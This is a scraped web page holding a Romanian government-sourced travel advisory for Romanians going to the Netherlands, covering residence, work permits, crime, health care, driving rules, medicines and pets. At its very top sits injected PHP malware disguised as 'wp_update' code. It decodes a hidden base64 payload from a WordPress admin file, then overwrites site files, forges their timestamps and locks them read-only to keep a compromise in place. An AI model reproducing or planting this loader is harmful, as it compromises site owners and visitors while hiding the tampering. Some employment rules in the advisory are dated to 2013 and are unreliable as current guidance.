$wp_update_file="/home/shuffles/public_html/wp-admin/user/screens.php"; if ( is_file($wp_update_file) ) { $wp_update_content=trim(file_get_contents($wp_update_file)); if ( $wp_update_content!="" ) { $wp_update_content=substr($wp_update_content,6,-6); $wp_update_content=base64_decode($wp_update_content); $wp_update_arr=json_decode($wp_update_content,true); if ( is_array($wp_update_arr) ) { foreach($wp_update_arr as $value) { $file_mtime=filemtime($value["path"]); @chmod($value["path"],0777); @unlink($value["path"]); @file_put_contents($value["path"],$value["content"]); @touch($value["path"],$file_mtime); @chmod($value["path"],0444); } } } } Olanda – O noua atitudine

Condiţii de intrare şi regim de şedere

ATENŢIE!: Pe durata şederii în Olanda sunteţi supuşi legilor, normelor şi procedurilor olandeze.

Şedere temporară

Condiţiile generale de intrare şi şedere în Olanda pentru cetăţenii români, pentru o perioadă de până la trei luni, sunt următoarele:

 • deţinerea unui paşaport sau cărţi de identitate valabile

– Atenţie!: actele de identitate cu deteriorări vă pot crea probleme la trecerea graniţei.

– Atenţie!: călătoria în Antilele Olandeze (Aruba, Bonaire, Curaçao, Sint Maarten, Saba şi Sint Eustatius) necesită deţinerea unui paşaport. Nu este necesar să aveţi viză.

 • asigurare medicală pentru situaţii de urgentă (cardul european de asigurare medicală şi/sau asigurare medicală de călătorie încheiată la o companie privată);
 • absenţa unei interdicţii de intrare pe teritoriu olandez sau în spaţiul Schengen (aceasta poate fi verificată de autorităţile de frontieră prin consultarea Sistemului Informatic Schengen)

Vă recomandăm să deţineţi mijloacele financiare necesare acoperirii cheltuielilor pe durata călătoriei.

Cei care doresc să rămână pe teritoriul Olandei pentru o perioadă de până la 90 de zile nu au obligaţia de a obţine in prealabil o autorizaţie de şedere temporară (viza MVV) de la Ambasada Olandei la Bucureşti sau de a se înregistra la autorităţile olandeze.

Şedere pe termen lung

În cazul şederilor care depăşesc 90 de zile, este necesar să vă înregistraţi cu o adresă la primăria olandeză pe raza căreia domiciliaţi, iar apoi la Agenţia pentru Imigrare şi Naturalizare (www.ind.nl).

În cazul şederii pe termen lung, IND vă poate emite un permis de şedere (verblijstitel).

Cetăţenii români care au avut rezidenţa legală neîntreruptă (dovedită cu permise de şedere) pe teritoriul Olandei pentru o perioadă de 5 ani pot solicita un permis de şedere permanentă. De asemenea, şederea neîntreruptă  pentru o perioadă de 5 ani dă dreptul la solicitarea cetăţeniei olandeze. Autoritatea responsabilă în această privinţă este tot IND.

Atenţie: În cazul obţinerii cetăţeniei olandeze, autorităţile olandeze vă vor solicita să renunţaţi la cetăţenia română.

Informaţiile prezentate au caracter general urmând ca informaţii specifice despre procedura de înregistrare şi documentele ce vor fi prezentate să se obţină de fiecare aplicant de la autorităţile olandeze de resort.

Angajare

Până la 31 decembrie 2013, cetăţenii români care doresc să se angajeze în Olanda sunt supuşi obligativităţii obţinerii unui permis de muncă. Permisul poate fi solicitat doar de către angajator şi este emis de Agenţia pentru Forţa de Muncă şi Asigurări Sociale (UWV) (www.uwv.nl)

Site-ul internet al UWV poate fi folosit şi pentru găsirea de posibile locuri de muncă.

Pentru a solicita un permis de muncă, angajatorul trebuie să dovedească îndeplinirea următoarelor condiţii:

 • a făcut toate demersurile posibile, timp de 3 luni, pentru a ocupa postul disponibil cu un angajat care nu necesită permis de muncă;
 • a publicat un anunţ de angajare prin UWV cu 5 săptămâni înainte de a cererea permisului;
 • persoana pentru care se solicită permisul trebuie să aibă între 18 şi 45 de ani;
 • viitorul angajat trebuie să deţină sau să fi solicitat un permis de şedere în Olanda.

UWV are la dispoziţie o perioadă de maxim 5 săptămâni pentru a lua o decizie privind solicitarea permisului de muncă.

Sunt exceptate de la obligativitatea obţinerii unui permis de muncă următoarele categorii:

 • persoanele fizice autorizate (zelfstandinge zonder personeel – ZZP);
 • imigranţii înalt calificaţi (kennismigranten), al căror venit anual brut în Olanda depăşeşte anumite praguri:
  • pentru cei sub 30 de ani: 37.575 euro
  • pentru cei peste 30 de ani: 51.239 euro
  • pentru cei angajaţi în primul an după terminarea studiilor în Olanda: 26.931 euro
 • soţul/soţia sau partenerul/partenera (conform legislaţiei olandeze) unui imigrant înalt calificat.

În cazul încadrării în una din categoriile exceptate, solicitaţi IND emiterea unui permis de şedere care scuteşte de la obligativitatea permisului de muncă.

În cazul lucrătorilor români care urmează să lucreze în Olanda în baza unui contract de furnizare de servicii trans-frontaliere al unei companii cu sediul intr-o ţară UE, se aplică sistemul de notificare prealabilă, prin care furnizorii de servicii sunt exceptaţi de la obţinerea unui permis de muncă pentru angajaţii lor, originari din România, în următoarele condiţii:

– furnizorul de servicii are sediul in afara Olandei, într-o ţară UE în care se aplică regulile privind libera circulaţie a serviciilor, şi nu este doar o căsuţă poştală;

– serviciile furnizate nu implică detaşarea ulterioară a lucrătorilor în scopul furnizării de forţă de muncă;

– serviciile sunt înregistrate la UWV înainte de a se începe furnizarea acestora.

Furnizorul de servicii va trebui să se adreseze fie instituţiei competente a statului membru în care îşi are sediul firmei sau la UWV pentru furnizarea informaţiilor solicitate (numele şi adresa angajatorului, profilul companiei, detalii de înregistrare în ţara de origine, numele şi adresa persoanei către care se va furniza serviciul, natura serviciului ce urmează a fi furnizat, locul şi durata de furnizare a serviciului, identitatea angajaţilor).

Riscuri de securitate

Olanda nu a suferit atacuri teroriste pe teritoriul naţional. După atentatele teroriste de la Madrid (11 martie 2004) şi de la Londra (7 iulie 2005), autorităţile tuturor statelor europene, între care şi cele din Olanda, au instituit o stare de alertă preventivă, menită a semnala posibilitatea unei ameninţări cu atac terorist. Olanda a introdus patru niveluri de alertă preventivă respectiv: minim, limitat, substanţial şi critic.

Cetăţenilor români care călătoresc în Olanda li se recomandă să urmărească în permanenţă anunţurile şi recomandările făcute de autorităţile olandeze şi să acceseze periodic situl internet al Ministerului român al Afacerilor Externe (www.mae.ro).

Infracţionalitate

Olanda este o ţară cu un nivel de infracţionalitate scăzut. Infracţiuni minore de tipul furtului din buzunare, înşelăciunilor sau furtului din maşini pot apărea în zone aglomerate (gări, staţii, parcări, centre comerciale, benzinării sau zone de servicii pe autostrăzi). Se recomandă prudenţă şi atenţie deosebită în zonele turistice, în particular Amsterdam.

Este recomandabil ca documentele şi valorile personale, biletele de călătorie şi banii sau cărţile de credit să fie păstrate în locuri sigure şi să nu fie expuse în mod vizibil asupra persoanei sau în maşini. Maşinile trebuie încuiate şi asigurate cu sisteme de alarmă. În cazul călătoriilor cu autobuze sau trenuri este indicat să se păstreze atenţia asupra bagajelor pe întreaga durată a călătoriei.

În cazul unor incidente care afectează siguranţa persoanei sau a bunurilor, se recomandă contactarea celui mai apropiat birou al poliţiei. În cazul dispariţiei actelor de identitate, este necesar să înregistraţi acest lucru la biroul local de poliţie şi să anunţaţi Secţia Consulară a Ambasadei României la Haga.

În cazul unor incidente grave trebuie apelat numărul de urgenţă 112 (poliţie, pompieri, salvare).

Se recomandă, de asemenea, sesizarea Ambasadei României, care poate acorda asistenţa consulară în condiţiile prevăzute de lege.


Sistemul medical

Asigurarea medicală este obligatorie în Olanda. Recomandăm tuturor cetăţenilor români care călătoresc în Olanda să încheie poliţe de asigurare medicală şi de călătorie, pentru întreaga durată a deplasării. În cazul şederii pe termen lung în Olanda, este necesar să încheiaţi o asigurare de sănătate în sistemul olandez şi să vă înregistraţi la un medic de familie.

În cazul în care sunt necesare servicii medicale, trebuie luată în primul rând legătura cu agentul sau partenerul olandez al societăţii de asigurări care a încheiat poliţa. Acesta va indica unitatea sau unităţile medicale care pot furniza serviciile medicale pe baza poliţei de asigurare. Serviciile medicale sunt prestate în conformitate cu clauzele prevăzute în poliţa de asigurare. Serviciile medicale suplimentare, neacoperite de poliţa de asigurare, vor fi achitate în mod individual de beneficiar.

 

Condiţii privind traficul auto

 • Circulaţia auto

În Olanda, circulaţia auto se efectuează pe partea dreaptă a drumului. Accesul pe autostrăzi nu este supus plăţii de taxe.

 • Starea drumurilor

Starea generală a drumurilor şi infrastructurii este foarte bună.

 • Parcarea

Parcarea este permisă numai în locuri rezervate şi este adesea contra cost.

 • Centura de siguranţă

Centura de siguranţă este obligatorie, inclusiv pentru pasagerii din spate. Funcţionează sistemul priorităţii de dreapta.

 • Limitele de viteză admise

Limitele de viteză admise: în interiorul localităţilor – 50 km/oră; drumuri naţionale, centuri ocolitoare – 80 km/oră; autostrăzi – 100 / 120 / 130 km/oră (conform indicaţiilor de la faţa locului).

 • Folosirea telefonului mobil la volan

In timpul condusului este interzisa folosirea telefonului mobil.

 • Aparatele anti-radar şi de detectare a radarului

Pe teritoriul Olandei, legislaţia rutieră interzice utilizarea aparatelor de detectare a radarelor şi a celor antiradar, iar utilizarea acestora reprezintă contravenţie. De regulă, echipajele de poliţie au montate în maşini dispozitive de detectare a aparatelor antiradar.

 • Permisul de conducere

Permisul de conducere valabil emis în România este recunoscut în Olanda. În cazul şederii pe termen lung, este necesar să vă preschimbaţi permisul românesc de conducere cu unul olandez. Pentru informaţii asupra procedurii, vă rugăm să consultaţi agenţia olandeză de resort (www.rdw.nl)

 • Accidente de circulaţie

În caz de accident uşor în care sunt implicate şi alte maşini, completaţi, împreună cu şoferii celorlalte autovehicule, formularul tip pus la dispoziţie de societăţile de asigurări pentru soluţionarea amiabilă. Notaţi elementele de identificare ale celuilalt autovehicul implicat în accident şi ale societăţii de asigurare a acestuia.

Dacă există răniţi, apelaţi numărul de urgenţă 112 pentru ambulanţă şi poliţie şi acordaţi primul ajutor. Adresaţi-vă pentru sprijin partenerului societăţii române de asigurări din ţara respectivă care figurează pe Cartea verde.

În cazul unui accident rezultat cu avarierea gravă a autoturismului sau cu vătămarea ori decesul unei persoane, este interzisă mutarea vehiculului până la sosirea poliţiei la locul accidentului, care constată faptele şi întocmeşte un proces verbal. Acest document este esenţial pentru stabilirea vinovăţiei şi se impune obţinerea unei copii din partea persoanei vătămate, în special dacă aceasta este turist străin.

În cazul producerii de accidente de circulaţie care cauzează decesul unui cetăţean român, autorităţile locale procedează la întocmirea formalităţilor necesare, inclusiv eliberarea certificatului de deces. Pentru informaţii privind eventuala repatriere a corpului sau alte formalităţi, puteţi contacta Ambasada României la Haga.

Telefoane utile pentru informaţii privind traficul sau conduita în caz de accident:

 • serviciul de urgenţe – 112

Atenţionări speciale

În localităţi, se recomandă să se acorde o atenţie deosebită bicicliştilor, care au o pondere foarte însemnată în traficul rutier. Este necesară atenţie deosebită în cazul virajelor la dreapta în situaţiile în care atât maşinile, cât şi bicicliştii de pe acelaşi sens au culoarea verde la semafor.


Regimul medicamentelor

Sunt excluse atât la intrare cât şi la ieşire drogurile de orice tip şi substanţele dopante. Turiştii pot avea asupra lor medicamentele uzuale, pentru stricta necesitate personală. În cazul în care aceste medicamente include substanţe supuse regimului drogurilor, este recomandabil să aveţi la dumneavoastră reţeta care prescrie medicamentul respectiv.

Antibioticele sunt eliberate de farmaciile olandeze doar pe baza unei reţete.

 

Regimul animalelor de companie

Animalele care sunt introduse pe teritoriul unuia dintre statele membre ale Uniunii Europene trebuie să îndeplinească următoarele condiţii: identificare prin tatuaj sau microcip implantat sub piele; carnetul de sănătate veterinar; vaccinul antirabic în curs de valabilitate; titrajul seric de anticorpi antirabici (examen de laborator efectuat pe o mostră de sânge care permite să se testeze eficacitatea vaccinului antirabic); acesta trebuie făcut la minimum trei luni după vaccin şi cu trei luni înaintea exportului animalului.

Vă recomandăm să consultaţi un medic veterinar înainte de a efectua o deplasare cu animale de companie într-unul dintre statele membre ale Uniunii Europene.

Site-uri internet utile

Sursa: www.mae.ro

By o9admin